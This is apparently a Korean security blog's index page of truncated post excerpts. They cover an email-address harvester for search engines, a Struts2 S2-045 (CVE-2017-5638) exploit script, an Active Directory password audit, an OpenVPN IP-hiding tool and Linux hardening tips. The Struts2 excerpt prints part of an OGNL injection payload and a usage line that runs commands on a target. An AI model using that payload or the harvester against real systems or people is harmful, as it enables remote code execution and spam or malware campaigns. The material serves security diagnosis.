* 이메일 주소를 왜 수집하지?– 악성코드, 바이러스 등을 이메일로 유포하기 위해서 공격자는 이메일 주소를 얻을 필요가 있어– 제일 간단하게 이메일 주소를 얻을 수 있는 방법은 검색을 이용하는 것이지– 이 스크립트는 검색엔진에서 검색한 결과에서 이메일 주소를 파싱해서 출력해줘– kitploit에 게시된 infoga를 일부 수정하여 만들었어 * 이용하는 검색엔진– google, bing, yahoo, pgp 검색엔진을 이용하여 이메일 주소를 수집해 […]
간단한 E-mail Address 수집기(python) 더 읽기"
(*) 출처: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload +=
중국이 공격하는 Struts2 취약점(CVE 2017-5638 – Apache Struts2 S2-045) 진단 스크립트(Python) 더 읽기"
– Active Directory는 조직내의 자원에 대한 접근통제를 위해 기업이나 기관의 규모와 상관없이 많이 사용되고 있습니다.– 그러나 Active Directory의 서비스 특성을 고려한 보안진단을 하는 곳은 아직까지 드문것으로 보입니다.– Active Directory 보안진단의 중요 포인트는 Domain Controller, Group Policy, User Account, Event Log 등이 있습니다.– 최근 글로벌 조직의 Active Directory를 운영하는 고객사에 대한 취약점 진단에는 Ad User 계정을
Active Directory bad password 계정진단 Script(Powershell) 더 읽기"
* 자기 IP를 숨기려는 목적은 여러 가지가 있다.– 구글이 중국에서 철수 했을때도 Public VPN을 이용하여 차단만을 우회하는 중국인들도 많았고– Red Team으로 구성된 Real PT를 수행하기 위해 불가피하게 자신의 IP를 숨겨야 하는 상황도 있고– 보안 취약점 진단을 하면서 Block된 자신을 IP를 우회하기 위해 사용되기도 하며– 간단한 보안 시스템을 개발한 후 서로 다른 Source IP로 테스트하기 위한
OpenVPN으로 자신의 IP를 숨기는 간단한 프로그램(golang) 더 읽기"
금융부문 무선랜 보안 가이드 – 금융보안연구원, 2010.12 금융부문 무선랜 보안 가이드-금융보안연구원, 2010.12 제 1 장 개 요제 1 절 배 경제 2 절 목 적제 3 절 범 위 제2장 무선랜 서비스 현황 제 1 절 무선랜 기술표준 및 현황1. 무선랜 기술표준2. 무선랜 서비스 현황3. 세계 무선랜 보안 관련 주요 국가 제도 제 2 절
The md5sum command is used to compute a 128-bit fingerprint that is strongly dependant upon the contents of the file to which it is applied. It can be used to compare against a previously-generated sum to determine whether the file has changed. It is commonly used to ensure the integrity of updated packages distributed by
Checking Package Integrity 더 읽기"
Several kernel configuration options are available to improve security through the /proc pseudo-filesystem. Quite a few of the files in /proc/sys are directly related to security. Enabled if contains a 1 and disabled if it contains a 0. Many of the options available in /proc/sys/net/ipv4 include: • icmp_echo_ignore_all: Ignore all ICMP ECHO requests. Enabling this
• AutoRPM on Red Hat and apt-get on Debian can be used to download and install any packages on your system for which there are updates. Use care when automatically updating production servers. • IP Masquerading enables a Linux box with multiple interfaces to act as a gateway to remote networks for hosts connected to
• Limit Apache to listen only on local interface by configuring /etc/httpd/conf/httpd.conf to read: Listen 127.0.0.1:80 • Use the following to disable access to the entire filesystem by default, unless explicitly permitted. This will disable printing of indexes if no index.html exists, server-side includes, and following symbolic links. Disabling symlinks may impact performance for large
Disabling or removing unused programs and services from your host is the most effective way to limit threats originating from a remote host. Use your distributions package management tools to scan the list of installed packages, then remove those that are unnecessary. • Many of the services running from inetd are legacy programs, which are
Disable Unnecessary Services 더 읽기"
